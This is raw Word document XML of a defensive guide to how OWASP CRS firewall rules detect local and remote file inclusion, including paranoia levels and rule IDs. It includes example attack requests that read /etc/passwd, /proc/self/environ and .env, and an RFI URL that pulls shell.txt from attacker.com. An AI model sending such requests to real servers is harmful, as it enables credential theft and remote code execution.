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CD" w:rsidRDefault="00F943CD" w:rsidP="00F943CD">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>LFI (Local File Inclusion)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a vulnerability that allows an attacker to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F943CD">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>trick a web application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into including files from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F943CD">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>local server file system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This is usually done by </w:t>
      </w:r>
      <w:r w:rsidRPr="00F943CD">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>manipulating input parameters</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that load files, such as:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F943CD">
        <w:t>include($_GET['page']);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">A request like: </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00796920">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/index.php?page=about.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
        <w:t>Can be tampered as:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00796920">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/index.php?page=../../../../etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001F1A31">
        <w:br/>
      </w:r>
      <w:r w:rsidR="001F1A31">
        <w:br/>
      </w:r>
      <w:r w:rsidR="001F1A31" w:rsidRPr="001F1A31">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E44245" wp14:editId="21683037">
            <wp:extent cx="2758440" cy="262051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992" cy="26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Paranoia Levels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F943CD" w:rsidRDefault="00F943CD" w:rsidP="00F943CD">
      <w:r>
        <w:t>CRS organizes rules into paranoia levels (PL) to balance security and false positives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F943CD" w:rsidRDefault="00F943CD" w:rsidP="00F943CD">
      <w:r>
        <w:t xml:space="preserve">PL1: Default level, detects obvious attacks with low false positives. </w:t>
      </w:r>
      <w:r w:rsidR="00305307">
        <w:t>Suitable for most applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F943CD" w:rsidRDefault="00F943CD" w:rsidP="00F943CD">
      <w:r>
        <w:t>PL2: More sensitive, catches complex attacks bu</w:t>
      </w:r>
      <w:r w:rsidR="00305307">
        <w:t>t may block legitimate traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F943CD" w:rsidRDefault="00F943CD" w:rsidP="00F943CD">
      <w:r>
        <w:t xml:space="preserve">PL3: Highly sensitive, for high-security environments, </w:t>
      </w:r>
      <w:r w:rsidR="00305307">
        <w:t>with increased false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F551E5" w:rsidRDefault="00F943CD" w:rsidP="00F551E5">
      <w:r>
        <w:t>PL4: Extremely strict, used in critical systems but prone to blocking valid requests.</w:t>
      </w:r>
      <w:r w:rsidR="00305307">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00305307">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Phase 1 (Request Headers) Rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Phase 1 rules execute early — when only request headers are available. These don’t detect LFI directly, but control which rules are active based on paranoia level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB"/>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Rule ID: 930011</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Purpose: Skip all PL2+ LFI rules if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> paranoia level is less than 2.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Trigger: Confi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guration with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paranoia_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Effect: Optimizes performance by skipping higher sensitivity rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB"/>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Rule ID: 930013</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Purpose: Skip PL3+ L</w:t>
      </w:r>
      <w:r>
        <w:t>FI rules if paranoia level &lt; 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t xml:space="preserve">Trigger: Configuration with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paranoia_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB"/>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Rule ID: 930015</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Purpose: Skip PL4 LFI rules if paranoia level &lt; 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB"/>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t xml:space="preserve">Trigger: Configuration with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paranoia_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB"/>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Rule ID: 930017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Purpose: Placeholder rule for future</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> custom LFI rules or expansion.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Effect: Currently does nothing but reserves rule ID range.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Phase 2 (Request B</w:t>
      </w:r>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ody) Rules – Core LFI Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t xml:space="preserve">Phase 2 begins after the request body (query strings, POST data, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cookies</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) is available. Al</w:t>
      </w:r>
      <w:r>
        <w:t>l LFI detection rules are here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rule ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: 930100</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Path Traversal (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Purpose: Detects classi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">c directory traversal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>using ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Pat</w:t>
      </w:r>
      <w:r>
        <w:t>tern: Looks for (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>../)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in ARGS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>?file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/../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E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB"/>
    <w:p w:rsidR="008E72AB" w:rsidRPr="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rule</w:t>
      </w:r>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> ID: 930110 – Encoded Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Purpose: Detects URL-encoded ve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rsions </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>of ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>such</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as %2e%2e%2f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Sources: Arg</w:t>
      </w:r>
      <w:r>
        <w:t>uments, cookies, argument names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>?file=%2e%2e%2fetc%2fpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRPr="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRPr="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> R</w:t>
      </w:r>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ule ID: 930120 – OS File Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t xml:space="preserve">Purpose: Detects access to sensitive OS files listed in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lfi-os-files.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (e.g.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proc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/self/environ)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>?input=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/self/environ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB"/>
    <w:p w:rsidR="008E72AB" w:rsidRPr="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Rule ID: 930130 – Restricted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E72AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/Hidden Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB"/>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Purpose: Prevents access to application-level sensitive files from restricted-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>files.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (e.g</w:t>
      </w:r>
      <w:r>
        <w:t>. .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>Example</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>GET /.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008E72AB" w:rsidRDefault="008E72AB" w:rsidP="008E72AB">
      <w:r>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>page.php?file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=.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.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Client Request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Phase 1 (Check PL rules)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>↳</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> If PL1 Active </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Phase 2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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>↳</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Rule 930100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">930130 Checked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gramStart"/>
      <w:r>
        <w:t>If</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> any matched </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Anomaly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>≥</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BLOCK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="008E72AB" w:rsidP="00C10D21">
      <w:r>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>↳</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Allow</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C10D21">
        <w:t>What</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C10D21">
        <w:t xml:space="preserve"> is Remote File Inclusion (RFI)?</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Remote File Inclusion (RFI)</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t xml:space="preserve"> is a web vulnerability that allows an attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>include and execute external (remote) scripts or files</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t xml:space="preserve"> on the server by manipulating input parameters that are used in dynamic file loading.</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t>Malicious Request Example</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00C10D21" w:rsidRPr="00796920">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/index.php?page=http://attacker.com/shell.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t xml:space="preserve">This would cause the server to download and execute </w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>shell.txt</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t xml:space="preserve"> from the attacker's server</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t>Paranoia Levels in CRS (RFI Context)</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t>PL1</w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t xml:space="preserve">            Default </w:t>
      </w:r>
      <w:r w:rsidR="00C10D21">
        <w:t>Detects common and dangerous RFI patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PL2–PL4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">May include extended RFI checks or evasion </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Phase 1 – Paranoia Level Control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Phase 1 examines request headers and host-level settings to determine which rules to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Rule 931013 (Phase 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t xml:space="preserve">Purpose: Skips all RFI rules unless </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paranoia_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ≥ 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Use-case: With default PL1, this rule ensures stricter RFI checks are not run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Rule 931015 (Phase 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Purpose: Skips PL3 R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">FI rules if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paranoia_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt; 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Context: Helps structure future strict checks (currently none active).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Rule 931017 (Phase 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Purpose: Placeholder for PL4-level RFI rules; effectively no action under PL1/PL2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Phase 2 – Core RFI Detection Rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Phase 2 inspects the full request — query, headers, cookies — which is essential for detecting RFI payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t xml:space="preserve"> 931100 – URL Parameter Using IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Goal: Detect any parameter contai</w:t>
      </w:r>
      <w:r w:rsidR="009B6A89">
        <w:t>ning a full URL (including IP).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Regex: Looks for http:// or https:// i</w:t>
      </w:r>
      <w:r w:rsidR="009B6A89">
        <w:t>n ARGS, ARGS_NAMES, or headers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="009B6A89" w:rsidP="00C10D21">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
